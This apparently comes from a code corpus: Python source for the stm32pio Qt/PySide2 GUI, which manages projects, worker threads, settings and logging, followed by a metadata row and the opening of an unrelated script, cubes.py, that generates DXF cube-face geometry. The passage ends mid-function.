# TODO: maybe we should flush all remaining logs before termination
projects_logger_handler.buffers.pop(self.project_id) # unregister our buffer
module_logger.debug(f"exit LoggingWorker of project id {self.project_id}")
self.thread.quit()
class ProjectListItem(QObject):
"""
The core functionality class - the wrapper around the Stm32pio class suitable for the project GUI representation
"""
logAdded = Signal(str, int, arguments=['message', 'level']) # send the log message to the front-end
initialized = Signal(ProjectID, arguments=['project_id'])
def __init__(self, project_args: List[any] = None, project_kwargs: Mapping[str, Any] = None,
from_startup: bool = False, parent: QObject = None):
"""
Instance construction is split into 2 phases: the wrapper setup and inner Stm32pio class initialization. The
latter one is taken out to the separated thread as it is, potentially, a time-consuming operation. This thread
starts right after the main constructor so the wrapper is already built at that moment and therefore can be used
from GUI, be referenced and so on.
Args:
project_args: list of positional arguments that will be passed to the Stm32pio constructor
project_kwargs: dictionary of keyword arguments that will be passed to the Stm32pio constructor
from_startup: mark that this project comes from the beginning of the app life (e.g. from the NV-storage) so
it can be treated differently on the GUI side
parent: Qt parent
"""
super().__init__(parent=parent)
if project_args is None:
project_args = []
if project_kwargs is None:
project_kwargs = {}
self._from_startup = from_startup
underlying_logger = logging.getLogger('stm32pio.gui.projects')
self.logger = stm32pio.core.util.ProjectLoggerAdapter(underlying_logger, { 'project_id': id(self) })
self.logging_worker = LoggingWorker(project_id=id(self))
self.logging_worker.sendLog.connect(self.logAdded)
# QThreadPool can automatically queue new incoming tasks if a number of them are larger than maxThreadCount
self.workers_pool = QThreadPool(parent=self)
self.workers_pool.setMaxThreadCount(1)
self.workers_pool.setExpiryTimeout(-1) # tasks wait forever for the available spot
self._current_action: str = ''
self._last_action_succeed: bool = True
# These values are valid only until the Stm32pio project initialize itself (or failed to) (see init_project)
self.project = None
self._name = 'Loading...'
self._state = { 'LOADING': True } # pseudo-stage (not present in the ProjectStage enum but is used from QML)
self._current_stage = 'Loading...'
self.qml_ready = threading.Event() # the front and the back both should know when each other is initialized
# Register some kind of the deconstruction handler (later, after the project initialization, see init_project)
self._finalizer = None
if 'instance_options' not in project_kwargs:
project_kwargs['instance_options'] = { 'logger': self.logger }
elif 'logger' not in project_kwargs['instance_options']:
project_kwargs['instance_options']['logger'] = self.logger
# Start the Stm32pio part initialization right after. It can take some time so we schedule it in a dedicated
# thread
init_thread = threading.Thread(target=self.init_project, args=project_args, kwargs=project_kwargs)
init_thread.start()
def init_project(self, *args, **kwargs) -> None:
"""
Initialize the underlying Stm32pio project.
Args:
*args: positional arguments of the Stm32pio constructor
**kwargs: keyword arguments of the Stm32pio constructor
"""
try:
# time.sleep(2.0)
# raise Exception('blabla')
self.project = stm32pio.core.lib.Stm32pio(*args, **kwargs)
except Exception:
stm32pio.core.util.log_current_exception(self.logger)
if len(args):
self._name = args[0] # use a project path string (as it should be a first argument) as a name
else:
self._name = 'Undefined'
self._state = { 'INIT_ERROR': True } # pseudo-stage
self._current_stage = 'Initializing error'
else:
# Successful initialization. These values should not be used anymore but we "reset" them anyway
self._name = 'Project'
self._state = {}
self._current_stage = 'Initialized'
finally:
# Register some kind of the deconstruction handler
self._finalizer = weakref.finalize(self, self.at_exit, self.workers_pool, self.logging_worker,
self.name if self.project is None else str(self.project))
self.qml_ready.wait() # wait for the GUI to initialize (which one is earlier, actually, back or front)
# TODO: causing
# RuntimeWarning: libshiboken: Overflow: Value 4595188736 exceeds limits of type [signed] "i" (4bytes).
# OverflowError
self.initialized.emit(id(self))
self.nameChanged.emit() # in any case we should notify the GUI part about the initialization ending
self.stageChanged.emit()
self.stateChanged.emit()
@staticmethod
def at_exit(workers_pool: QThreadPool, logging_worker: LoggingWorker, name: str):
"""
The instance deconstruction handler is meant to be used with weakref.finalize() conforming with the requirement
to have no reference to the target object (so it doesn't contain any instance reference and also is decorated as
'staticmethod')
"""
# Wait forever for all the jobs to complete. Currently, we cannot abort them gracefully
workers_pool.waitForDone(msecs=-1)
logging_worker.stopped.set() # post the event in the logging worker to inform it...
logging_worker.thread.wait() # ...and wait for it to exit, too
module_logger.info(f"destroyed {name}")
@Property(bool)
def fromStartup(self) -> bool:
"""Is this project is here from the beginning of the app life?"""
return self._from_startup
@Property('QVariant')
def config(self) -> dict:
"""Inner project's ConfigParser config converted to the dictionary (QML JS object)"""
return {
section: {
key: value for key, value in self.project.config.items(section)
} if self.project is not None else {} for section in ['app', 'project']
}
nameChanged = Signal()
@Property(str, notify=nameChanged)
def name(self) -> str:
"""Human-readable name of the project. Will evaluate to the absolute path if it cannot be instantiated"""
if self.project is not None:
return self.project.path.name
else:
return self._name
stateChanged = Signal()
@Property('QVariant', notify=stateChanged)
def state(self) -> dict:
"""
Get the current project state in the appropriate Qt form. Update the cached 'current stage' value as a side
effect
"""
if self.project is not None:
state = self.project.state
# Side-effect: caching the current stage at the same time to avoid the flooding of calls to the 'state'
# getter (many IO operations). Requests to 'state' and 'stage' are usually goes together so there is no need
# to necessarily keeps them separated
self._current_stage = str(state.current_stage)
state.pop(stm32pio.core.lib.ProjectStage.UNDEFINED) # exclude UNDEFINED key
# Convert to {string: boolean} dict (will be translated into the JavaScript object)
return { stage.name: value for stage, value in state.items() }
else:
return self._state
stageChanged = Signal()
@Property(str, notify=stageChanged)
def currentStage(self) -> str:
"""
Get the current stage the project resides in.
Note: this returns a cached value. Cache updates every time the state property got requested
"""
return self._current_stage
@Property(str)
def currentAction(self) -> str:
"""
Stm32pio action (i.e. function name) that is currently executing or an empty string if there is none. It is set
on actionStarted signal and reset on actionFinished
"""
return self._current_action
@Property(bool)
def lastActionSucceed(self) -> bool:
"""Have the last action ended with a success?"""
return self._last_action_succeed
actionStarted = Signal(str, arguments=['action'])
@Slot(str)
def actionStartedSlot(self, action: str):
"""Pass the corresponding signal from the worker, perform related tasks"""
# Currently, this property should be set BEFORE emitting the 'actionStarted' signal (because QML will query it
# when the signal will be handled in StateMachine) (probably, should be resolved later as it is bad to be bound
# to such a specific logic)
self._current_action = action
self.actionStarted.emit(action)
actionFinished = Signal(str, bool, arguments=['action', 'success'])
@Slot(str, bool)
def actionFinishedSlot(self, action: str, success: bool):
"""Pass the corresponding signal from the worker, perform related tasks"""
self._last_action_succeed = success
if not success:
# Clear the queue - stop further execution (cancel planned tasks if an error had happened)
self.workers_pool.clear()
self.actionFinished.emit(action, success)
# Currently, this property should be reset AFTER emitting the 'actionFinished' signal (because QML will query it
# when the signal will be handled in StateMachine) (probably, should be resolved later as it is bad to be bound
# to such a specific logic)
self._current_action = ''
@Slot()
def qmlLoaded(self):
"""Event signaling the complete loading of the needed frontend components"""
self.qml_ready.set()
self.logging_worker.can_flush_log.set()
@Slot(str, 'QVariantList')
def run(self, action: str, args: List[Any]):
"""
Asynchronously perform Stm32pio actions (generate, build, etc.) (dispatch all business logic).
Args:
action: method name of the corresponding Stm32pio action
args: list of positional arguments for this action
"""
worker = Worker(getattr(self.project, action), args, self.logger, parent=self)
worker.started.connect(self.actionStartedSlot)
worker.finished.connect(self.actionFinishedSlot)
worker.finished.connect(self.stateChanged)
worker.finished.connect(self.stageChanged)
self.workers_pool.start(worker) # will automatically place to the queue
class Worker(QObject, QRunnable):
"""
Generic worker for asynchronous processes: QObject + QRunnable combination. First allows to attach Qt signals,
second is compatible with the QThreadPool
"""
started = Signal(str, arguments=['action'])
finished = Signal(str, bool, arguments=['action', 'success'])
def __init__(self, func: Callable[[List[Any]], Optional[int]], args: List[Any] = None,
logger: logging.Logger = None, parent: QObject = None):
"""
Args:
func: function to run. It should return 0 or None for the call to be considered successful
args: the list of positional arguments. They will be unpacked and passed to the function
logger: optional logger to report about the occurred exception
parent: Qt object
"""
QObject.__init__(self, parent=parent)
QRunnable.__init__(self)
self.func = func
self.args = args if args is not None else []
self.logger = logger
self.name = func.__name__
def run(self):
self.started.emit(self.name) # notify the caller
try:
result = self.func(*self.args)
except Exception:
if self.logger is not None:
stm32pio.core.util.log_current_exception(self.logger)
result = -1
if result is None or (type(result) == int and result == 0):
success = True
else:
success = False
self.finished.emit(self.name, success) # notify the caller
if not success:
# Pause the thread and, therefore, the parent QThreadPool queue so the caller can decide whether we should
# proceed or stop. This should not cause any problems as we've already perform all necessary tasks and this
# just delaying the QRunnable removal from the pool
time.sleep(1.0)
class ProjectsList(QAbstractListModel):
"""
QAbstractListModel implementation - describe basic operations and delegate all main functionality to the
ProjectListItem
"""
goToProject = Signal(int, arguments=['indexToGo']) # TODO: should probably belongs to list
def __init__(self, projects: List[ProjectListItem] = None, parent: QObject = None):
"""
Args:
projects: initial list of projects
parent: QObject to be parented to
"""
super().__init__(parent=parent)
self.projects = projects if projects is not None else []
self.workers_pool = QThreadPool(parent=self)
self.workers_pool.setMaxThreadCount(1) # only 1 active worker at a time
self.workers_pool.setExpiryTimeout(-1) # tasks wait forever for the available spot
@Slot(int, result=ProjectListItem)
def get(self, index: int):
"""
Expose the ProjectListItem to the GUI QML side. You should firstly register the returning type using
qmlRegisterType or similar
"""
if index in range(len(self.projects)):
return self.projects[index]
def rowCount(self, parent=None, *args, **kwargs):
return len(self.projects)
def data(self, index: QModelIndex, role=None):
if role == Qt.DisplayRole or role is None:
return self.projects[index.row()]
def _saveInSettings(self) -> None:
"""
Get correct projects and save them to Settings. Intended to be run in a thread (as it blocks)
"""
# Wait for all projects to be loaded (project.init_project is finished), whether successful or not
while not all(project.name != 'Loading...' for project in self.projects):
pass
# Only correct ones (inner Stm32pio instance has been successfully constructed)
projects_to_save = [project for project in self.projects if project.project is not None]
settings.beginGroup('app')
settings.remove('projects') # clear the current saved list
settings.beginWriteArray('projects')
for idx, project in enumerate(projects_to_save):
settings.setArrayIndex(idx)
# This ensures that we always save paths in pathlib form
settings.setValue('path', str(project.project.path))
settings.endArray()
settings.endGroup()
module_logger.info(f"{len(projects_to_save)} projects have been saved to Settings") # total amount
def saveInSettings(self) -> None:
"""Spawn a thread to wait for all projects and save them in background"""
self.workers_pool.start(Worker(self._saveInSettings, logger=module_logger, parent=self))
def each_project_is_duplicate_of(self, path: str) -> Iterator[bool]:
"""
Returns generator yielding an answer to the question "Is current project is a duplicate of one represented by a
given path?" for every project in this model, one by one.
Logic explanation: At a given time some projects (e.g., when we add a bunch of projects, recently added ones)
can be not instantiated yet so we cannot extract their project.path property and need to check before comparing.
In this case, simply evaluate strings. Also, samefile will even raise, if the given path doesn't exist.
"""
for list_item in self.projects:
try:
yield (list_item.project is not None and list_item.project.path.samefile(pathlib.Path(path))) or \
path == list_item.name # simply check strings if a path isn't available
except OSError:
yield False
def addListItem(self, path: str, list_item_kwargs: Mapping[str, Any] = None, go_to_this: bool = False,
on_initialized: Callable[[ProjectID], None] = None) -> ProjectListItem:
"""
Create and append to the list tail a new ProjectListItem instance. This doesn't save in QSettings, it's an up to
the caller task (e.g. if we adding a bunch of projects, it make sense to store them once in the end).
Args:
path: path as string
list_item_kwargs: keyword arguments passed to the ProjectListItem constructor
go_to_this: should we jump to the new project in GUI
on_initialized:
"""
# Shallow copy, dict makes it mutable
list_item_kwargs = dict(list_item_kwargs if list_item_kwargs is not None else {})
duplicate_index = next((idx for idx, is_duplicated in enumerate(self.each_project_is_duplicate_of(path))
if is_duplicated), -1)
if duplicate_index > -1:
# Just added project is already in the list so abort the addition
module_logger.warning(f"This project is already in the list: {path}")
# If some parameters were provided, merge them
proj_params = list_item_kwargs.get('project_kwargs', {}).get('parameters', {})
if len(proj_params):
self.projects[duplicate_index].logger.info(f"updating parameters from the CLI... {proj_params}")
# Note: will save stm32pio.ini even if there was not one
self.projects[duplicate_index].run('save_config', [proj_params])
self.goToProject.emit(duplicate_index) # jump to the existing one
return self.projects[duplicate_index]
else:
# Insert given path into the constructor args (do not use dict.update() as we have list value that we also
# want to "merge")
if len(list_item_kwargs) == 0:
list_item_kwargs = { 'project_args': [path] }
elif 'project_args' not in list_item_kwargs or len(list_item_kwargs['project_args']) == 0:
list_item_kwargs['project_args'] = [path]
else:
list_item_kwargs['project_args'][0] = path
# The project is ready to be appended to the model right after the main constructor (wrapper) finished.
# The underlying Stm32pio class will be initialized soon later in the dedicated thread
project = ProjectListItem(**list_item_kwargs)
if on_initialized is not None:
project.initialized.connect(on_initialized)
self.beginInsertRows(QModelIndex(), self.rowCount(), self.rowCount())
self.projects.append(project)
self.endInsertRows()
if go_to_this:
self.goToProject.emit(len(self.projects) - 1) # append always at the end
return project
@Slot('QStringList')
def addProjectsByPaths(self, paths: List[str]):
"""QUrl path (typically is sent from the QML GUI)"""
if len(paths):
for path_str in paths: # convert to strings
path_qurl = QUrl(path_str)
if path_qurl.isEmpty():
module_logger.warning(f"Given path is empty: {path_str}")
continue
elif path_qurl.isLocalFile(): # file://...
path: str = path_qurl.toLocalFile()
elif path_qurl.isRelative(): # this means that the path string is not starting with 'file://' prefix
path: str = path_str # just use a source string
else:
module_logger.error(f"Incorrect path: {path_str}")
continue
self.addListItem(path, list_item_kwargs={ 'parent': self })
self.saveInSettings() # save after all
else:
module_logger.warning("No paths were given")
@Slot(int)
def removeProject(self, index: int):
"""
Remove the project residing on the index both from the runtime list and QSettings
"""
if index in range(len(self.projects)):
self.beginRemoveRows(QModelIndex(), index, index)
project = self.projects.pop(index)
self.endRemoveRows()
# Re-save the settings only if this project is saved in the settings
if project.project is not None or project.fromStartup:
self.saveInSettings()
# It allows the project to be deconstructed (i.e. GC'ed) very soon, not at the app shutdown time
project.deleteLater()
class Settings(QSettings):
"""
Extend the class by useful get/set methods allowing to avoid redundant code lines and also are callable from the
QML side
"""
DEFAULTS = {
'editor': '',
'verbose': False,
'notifications': True
}
def __init__(self, prefix: str, defaults: Mapping[str, Any] = None, qs_args: List[Any] = None,
qs_kwargs: Mapping[str, Any] = None, external_triggers: Mapping[str, Callable[[str], Any]] = None):
"""
Args:
prefix: this prefix will always be added when get/set methods will be called so use it to group some most
important preferences under a single name. For example, prefix='app/params' while the list of users is
located in 'app/users'
defaults: mapping of fallback values (under the prefix mentioned above) that will be used if there is no
matching key in the storage
qs_args: positional arguments that will be passed to the QSettings constructor
qs_kwargs: keyword arguments that will be passed to the QSettings constructor
external_triggers: mapping where the keys are parameters names (under the prefix) and the values are
functions that will be called with the corresponding parameter value as the argument when the parameter
is going to be set. It's useful to setup the additional actions needed to be performed right after
a certain parameter gets an update
"""
qs_args = qs_args if qs_args is not None else []
qs_kwargs = qs_kwargs if qs_kwargs is not None else {}
super().__init__(*qs_args, **qs_kwargs)
self.prefix = prefix
defaults = defaults if defaults is not None else Settings.DEFAULTS
self.external_triggers = external_triggers if external_triggers is not None else {}
for key, value in defaults.items():
if not self.contains(self.prefix + key):
self.setValue(self.prefix + key, value)
@Slot()
def clear(self):
super().clear()
@Slot(str, result='QVariant')
def get(self, key):
value = self.value(self.prefix + key)
# On case insensitive file systems 'False' is saved as 'false' so we need to workaround this
if value == 'false':
value = False
elif value == 'true':
value = True
return value
@Slot(str, 'QVariant')
def set(self, key, value):
self.setValue(self.prefix + key, value)
if key in self.external_triggers.keys():
self.external_triggers[key](value)
class Application(QApplicationClass):
loaded = Signal(str, bool, arguments=['action', 'success'])
def quit(self):
"""Shutdown"""
for window in self.allWindows():
window.close()
def parse_args(args: list) -> Optional[argparse.Namespace]:
parser = argparse.ArgumentParser(description=inspect.cleandoc('''stm32pio GUI version.
Visit https://github.com/ussserrr/stm32pio for more information.'''))
# Global arguments (there is also an automatically added '-h, --help' option)
parser.add_argument('--version', action='version', version=f"stm32pio v{stm32pio.core.util.get_version()}")
parser.add_argument('-d', '--directory', dest='path', default=str(pathlib.Path.cwd()),
help="path to the project (current directory, if not given, but any other option should be specified then)")
parser.add_argument('-b', '--board', dest='board', default='', help="PlatformIO name of the board")
return parser.parse_args(args) if len(args) else None
def main(sys_argv: List[str] = None):
if sys_argv is None:
sys_argv = sys.argv[1:]
args = parse_args(sys_argv)
module_log_handler = logging.StreamHandler()
module_log_handler.setFormatter(logging.Formatter("%(levelname)s %(funcName)s %(message)s"))
module_logger.addHandler(module_log_handler)
module_logger.setLevel(logging.INFO) # set this again later after getting QSettings
module_logger.info('Starting stm32pio GUI...')
def qt_message_handler(mode, context, message):
"""
Register this logging handler for the Qt stuff if your platform doesn't provide a built-in one or if you want to
customize it
"""
if mode == QtInfoMsg:
mode = logging.INFO
elif mode == QtWarningMsg:
mode = logging.WARNING
elif mode == QtCriticalMsg:
mode = logging.ERROR
elif mode == QtFatalMsg:
mode = logging.CRITICAL
else:
mode = logging.DEBUG
qml_logger.log(mode, message)
# Apparently Windows version of PySide2 doesn't have QML logging feature turn on so we fill this gap
# TODO: set up for other platforms too (separate console.debug, console.warn, etc.)
qml_logger = logging.getLogger('stm32pio.gui.qml')
if platform.system() == 'Windows':
qml_log_handler = logging.StreamHandler()
qml_log_handler.setFormatter(logging.Formatter("[QML] %(levelname)s %(message)s"))
qml_logger.addHandler(qml_log_handler)
qInstallMessageHandler(qt_message_handler)
app = Application(sys.argv)
# These are used as a settings identifier too
app.setOrganizationName('ussserrr')
app.setApplicationName('stm32pio')
app.setWindowIcon(QIcon(str(MODULE_PATH.joinpath('icons/icon.svg'))))
global settings
def verbose_setter(value):
"""Use this to toggle the verbosity of all loggers at once"""
module_logger.setLevel(logging.DEBUG if value else logging.INFO)
qml_logger.setLevel(logging.DEBUG if value else logging.INFO)
projects_logger.setLevel(logging.DEBUG if value else logging.INFO)
formatter.verbosity = stm32pio.core.util.Verbosity.VERBOSE if value else stm32pio.core.util.Verbosity.NORMAL
settings = Settings(prefix='app/settings/', qs_kwargs={ 'parent': app },
external_triggers={ 'verbose': verbose_setter })
# Use "singleton" real logger for all projects just wrapping it into the LoggingAdapter for every project
projects_logger = logging.getLogger('stm32pio.gui.projects')
projects_logger.setLevel(logging.DEBUG if settings.get('verbose') else logging.INFO)
formatter = stm32pio.core.util.DispatchingFormatter(
general={
stm32pio.core.util.Verbosity.NORMAL: logging.Formatter("%(levelname)-8s %(message)s"),
stm32pio.core.util.Verbosity.VERBOSE: logging.Formatter(
f"%(levelname)-8s %(funcName)-{stm32pio.core.settings.log_fieldwidth_function}s %(message)s")
})
projects_logger_handler.setFormatter(formatter)
projects_logger.addHandler(projects_logger_handler)
verbose_setter(settings.get('verbose')) # set initial verbosity settings based on the saved state
settings.beginGroup('app')
restored_projects_paths: List[str] = []
for index in range(settings.beginReadArray('projects')):
settings.setArrayIndex(index)
restored_projects_paths.append(settings.value('path'))
settings.endArray()
settings.endGroup()
engine = QQmlApplicationEngine(parent=app)
qmlRegisterType(ProjectListItem, 'ProjectListItem', 1, 0, 'ProjectListItem')
qmlRegisterType(Settings, 'Settings', 1, 0, 'Settings')
projects_model = ProjectsList(parent=engine)
boards_model = QStringListModel(parent=engine)
engine.rootContext().setContextProperty('appVersion', stm32pio.core.util.get_version())
engine.rootContext().setContextProperty('Logging', stm32pio.core.util.logging_levels)
engine.rootContext().setContextProperty('projectsModel', projects_model)
engine.rootContext().setContextProperty('boardsModel', boards_model)
engine.rootContext().setContextProperty('appSettings', settings)
engine.load(QUrl.fromLocalFile(str(MODULE_PATH.joinpath('main.qml'))))
main_window = engine.rootObjects()[0]
# Getting PlatformIO boards can take a long time when the PlatformIO cache is outdated but it is important to have
# them before the projects list is restored, so we start a dedicated loading thread. We actually can add other
# start-up operations here if there will be a need to. Use the same Worker class to spawn the thread at the pool
def loading():
boards = ['None'] + stm32pio.core.util.get_platformio_boards()
boards_model.setStringList(boards)
def loaded(action_name: str, success: bool):
try:
cli_project_provided = args is not None
initialized_projects_counter = 0
def on_initialized(_: ProjectID):
nonlocal initialized_projects_counter
initialized_projects_counter += 1
if initialized_projects_counter == (len(restored_projects_paths) + (1 if cli_project_provided else 0)):
app.loaded.emit(action_name, all((list_item.project is not None for list_item in projects_model.projects)))
# Qt objects cannot be parented from the different thread so we restore the projects list in the main thread
for path in restored_projects_paths:
projects_model.addListItem(path, go_to_this=False, on_initialized=on_initialized, list_item_kwargs={
'from_startup': True,
'parent': projects_model
})
# At the end, append (or jump to) a CLI-provided project, if there is one
if cli_project_provided:
list_item_kwargs = {
'from_startup': True,
'parent': projects_model # TODO: probably can be omitted and automatically passed in the addListItem method (as we do now with a path)
}
if args.board:
list_item_kwargs['project_kwargs'] = { 'parameters': { 'project': { 'board': args.board } } } # pizdec konechno...
projects_model.addListItem(str(pathlib.Path(args.path)), go_to_this=True, on_initialized=on_initialized,
list_item_kwargs=list_item_kwargs)
projects_model.saveInSettings()
except Exception:
stm32pio.core.util.log_current_exception(module_logger)
success = False
main_window.backendLoaded.emit(success) # inform the GUI
loader = Worker(loading, logger=module_logger, parent=app)
loader.finished.connect(loaded)
QThreadPool.globalInstance().start(loader)
return app
# [necessary] globals
module_logger = logging.getLogger('stm32pio.gui.app') # use it as a console logger for whatever you want to, typically
# not related to the concrete project
projects_logger_handler = BuffersDispatchingHandler() # a storage of the buffers for the logging messages of all
# current projects (see its docs for more info)
settings = QSettings() # placeholder, will be replaced in main()
if __name__ == '__main__':
app_ = main()
sys.exit(app_.exec_())
| [
"[email protected]"
] | |
6f1679a486350368d7e4ec61e40ca834617f7468 | a62bb1b90a1cd206ef1485132400a60a222357f8 | /cubes.py | 82928421e9f6d010c2ce0e631fcb22b0e4f21379 | [] | no_license | palfrey/cube_generator | d5b40cfdaace87bba49d6caf43b183ba109f40b1 | 36a97c6796ec7154bb9fdc9c9ec16920fb32c4fc | refs/heads/master | 2021-01-10T21:27:02.370544 | 2012-03-04T12:54:32 | 2012-03-04T12:54:32 | 1,470,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,274 | py | import sdxf
from enum import Enum
import random
import operator
from optparse import OptionParser, OptionValueError
import math
class Direction(Enum):
POS_X = 1
POS_Y = 2
POS_Z = 3
NEG_X = 4
NEG_Y = 5
NEG_Z = 6
class Space:
def __init__(self, size, dimensions):
assert len(size) == 3, size
self.grid = [[[[] for z in range(size[2])] for y in range(size[1])] for x in range(size[0])]
self.dimensions = dimensions
def addBox(self, coords, owner):
assert [a for a in coords if a<0] == [], coords
try:
self.grid[coords[0]][coords[1]][coords[2]].append(owner)
except IndexError:
print coords
raise
def removeBox(self, coords, owner):
assert [a for a in coords if a<0] == [], coords
try:
assert owner in self.grid[coords[0]][coords[1]][coords[2]]
self.grid[coords[0]][coords[1]][coords[2]].remove(owner)
except IndexError:
print coords
raise
def fixCubes(self, cube_side):
sets = {}
# sequences with the same multiple owners first
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
for z in range(len(self.grid[x][y])):
if len(self.grid[x][y][z])>1:
key = tuple(sorted(self.grid[x][y][z]))
if key not in sets:
sets[key] = []
sets[key].append((x,y,z))
for key in sorted(sets.keys()):
if len(sets[key]) == 1:
continue
print "fixing", key, sorted(sets[key])
idx = random.randrange(len(key))
for (x,y,z) in sorted(sets[key]):
current = key[idx]
self.grid[x][y][z] = [current]
for a in range(len(key)):
if a != idx:
current.markNeighbour(key[a],x,y,z)
key[a].deleteCube(x,y,z)
idx = (idx +1) % len(key)
for x in range(len(self.grid)):
x2 = x+1
for y in range(len(self.grid[x])):
y2 = y+1
for z in range(len(self.grid[x][y])):
z2 = z+1
def pickOwner(x2,y2,z2):
if x2 <0 or y2<0 or z2<0 or x2>=self.dimensions[0]*cube_side or y2>=self.dimensions[1]*cube_side or z2>=self.dimensions[2]*cube_side:
return None
possibleOwner = self.grid[x2][y2][z2]
if len(possibleOwner) == 0: # nothing there
return None
if len(possibleOwner)!=1: # can't use it
return None
#assert len(possibleOwner) == 1, (possibleOwner, x2,y2,z2,x,y,z)
possibleOwner = possibleOwner[0]
if possibleOwner in self.grid[x][y][z]:
return possibleOwner
else:
return None
if len(self.grid[x][y][z])>1:
axes = range(3)
random.shuffle(axes)
for axe in axes:
if axe == 0: # X
poss = pickOwner(x-1,y,z)
if poss:
break
poss = pickOwner(x+1,y,z)
if poss:
break
elif axe == 1: # Y
poss = pickOwner(x,y-1,z)
if poss:
break
poss = pickOwner(x,y+1,z)
if poss:
break
elif axe == 2: # Z
poss = pickOwner(x,y,z-1)
if poss:
break
poss = pickOwner(x,y,z+1)
if poss:
break
else:
raise Exception, axe # shouldn't happen
if poss == None:
poss = self.grid[x][y][z][1]
#return
assert poss != None
for owner in self.grid[x][y][z]:
if owner == poss:
continue
owner.deleteCube(x,y,z)
self.grid[x][y][z] = [poss]
def generateCubes(self,d):
layers = {}
for x in range(len(self.grid)):
x2 = x+1
for y in range(len(self.grid[x])):
y2 = y+1
for z in range(len(self.grid[x][y])):
z2 = z+1
if len(self.grid[x][y][z]) == 0:
continue
owner = self.grid[x][y][z][0]
if owner.colour.value() not in layers:
layers[owner.colour.value()] = ("layer-%d"%owner.colour.value()).upper()
d.layers.append(sdxf.Layer(name=layers[owner.colour.value()], color=owner.colour.value()))
def doSide(points):
d.append(sdxf.Face(points=points, layer=layers[owner.colour.value()]))
doSide([(x,y,z),(x2,y,z),(x2,y2,z),(x,y2,z)])
doSide([(x,y,z),(x,y2,z),(x,y2,z2),(x,y,z2)])
doSide([(x,y,z),(x2,y,z),(x2,y,z2),(x,y,z2)])
doSide([(x2,y2,z2),(x,y2,z2),(x,y,z2),(x2,y,z2)])
doSide([(x2,y2,z2),(x2,y,z2),(x2,y,z),(x2,y2,z)])
doSide([(x2,y2,z2),(x,y2,z2),(x,y2,z),(x2,y2,z)])
class DXFColours(Enum):
Red = 1
Yellow = 2
Green = 3
Cyan = 4
Blue = 5
Magenta = 6
White = 7
class Face:
colours = list(iter(DXFColours))
last_colour = -1
last_index = -1
def __init__(self, direction, width, height, origin, space):
self.colour = Face.colours[Face.last_colour+1]
if Face.last_colour +2 >= len(Face.colours):
Face.last_colour = -1
else:
Face.last_colour +=1
self.index = Face.last_index +1
Face.last_index +=1
self.width = width
self.height = height
self.origin = list(origin)
self.grid = [[True for y in range(height)] for x in range(width)]
self.direction = direction
self.neighbour = [set() for x in range(4)]
#print "face", origin, width, height, self.colour
self.forAllCubes(space.addBox, (self,))
def removeCubes(self):
self.forAllCubes(space.removeBox, (self,))
def forAllCubes(self, func, args):
for a in range(self.width):
for b in range(self.height):
if self.direction == Direction.POS_X:
func((self.origin[0], self.origin[1]+a, self.origin[2]+b), *args)
elif self.direction == Direction.POS_Y:
func((self.origin[0]+a, self.origin[1], self.origin[2]+b), *args)
elif self.direction == Direction.POS_Z:
func((self.origin[0]+a, self.origin[1]+b, self.origin[2]), *args)
elif self.direction == Direction.NEG_X:
func((self.origin[0]-1, self.origin[1]-a-1, self.origin[2]-b-1), *args)
elif self.direction == Direction.NEG_Y:
func((self.origin[0]-a-1, self.origin[1]-1, self.origin[2]-b-1), *args)
elif self.direction == Direction.NEG_Z:
func((self.origin[0]-a-1, self.origin[1]-b-1, self.origin[2]-1), *args)
else:
raise Exception, self.direction
def _translateLocation(self, x, y, z):
if self.direction == Direction.POS_X:
assert self.origin[0] == x,x
assert y>=self.origin[1] and y<self.origin[1]+self.width,y
assert z>=self.origin[2] and z<self.origin[2]+self.height,z
assert self.grid[y-self.origin[1]][z-self.origin[2]]
return (y-self.origin[1],z-self.origin[2])
elif self.direction == Direction.POS_Y:
assert x>=self.origin[0] and x<self.origin[0]+self.width,x
assert self.origin[1] == y,y
assert z>=self.origin[2] and z<self.origin[2]+self.height,z
assert self.grid[x-self.origin[0]][z-self.origin[2]]
return (x-self.origin[0],z-self.origin[2])
elif self.direction == Direction.POS_Z:
assert x>=self.origin[0] and x<self.origin[0]+self.width,x
assert y>=self.origin[1] and y<self.origin[1]+self.width,y
assert self.origin[2] == z,z
assert self.grid[x-self.origin[0]][y-self.origin[1]]
return (x-self.origin[0],y-self.origin[1])
elif self.direction == Direction.NEG_X:
assert self.origin[0]-1 == x,x
assert y<self.origin[1] and y>self.origin[1]-self.height-1,y
assert z<self.origin[2] and z>self.origin[2]-self.height-1,z
assert self.grid[self.origin[1]-y-1][self.origin[2]-z-1]
return (self.origin[1]-y-1,self.origin[2]-z-1)
elif self.direction == Direction.NEG_Y:
assert x<self.origin[0] and x>self.origin[0]-self.width-1,x
assert self.origin[1]-1 == y,y
assert z<self.origin[2] and z>self.origin[2]-self.height-1,z
assert self.grid[self.origin[0]-x-1][self.origin[2]-z-1]
return (self.origin[0]-x-1,self.origin[2]-z-1)
elif self.direction == Direction.NEG_Z:
assert x<self.origin[0] and x>self.origin[0]-self.width-1,x
assert y<self.origin[1] and y>self.origin[1]-self.height-1,y
assert self.origin[2]-1 == z,z
assert self.grid[self.origin[0]-x-1][self.origin[1]-y-1]
return (self.origin[0]-x-1,self.origin[1]-y-1)
else:
raise Exception, self.direction
def deleteCube(self, x, y, z):
try:
(x2,y2) = self._translateLocation(x,y,z)
self.grid[x2][y2] = False
except:
pass
def markNeighbour(self, other, x, y, z):
try:
(x2,y2) = self._translateLocation(x,y,z)
except:
return
if x2 == 0:
if (y2>0 and y2<self.height-1):
self.neighbour[0].add(other)
elif y2 == 0:
if (x2>0 and x2<self.width-1):
self.neighbour[1].add(other)
elif x2 == self.width-1:
if (y2>0 and y2<self.height-1):
self.neighbour[2].add(other)
elif y2 == self.height-1:
if (x2>0 and x2<self.width-1):
self.neighbour[3].add(other)
else:
pass
#raise Exception, (x2,y2, x,y,z, self.direction)
def _setChar(self, out, x,y, char):
out[y] = out[y][:x] + char + out[y][x+1:]
def printFace(self, path = []):
out = dict([(a, " "*((self.width*2)+1)) for a in range((self.height*2)+1)])
for x in range(len(self.grid)):
for y in range(len(self.grid[x])):
if self.grid[x][y]:
self._setChar(out, (x*2)+1, (y*2)+1, "T")
else:
self._setChar(out, (x*2)+1, (y*2)+1, "F")
if path!=[]:
for a in range(len(path)-1):
(x,y) = path[a]
(x2,y2) = path[a+1]
if y != y2:
assert x == x2,(path[a],path[a+1])
assert abs(y2-y) == 1,(path[a],path[a+1])
if y2<y:
y = y2
for b in range(3):
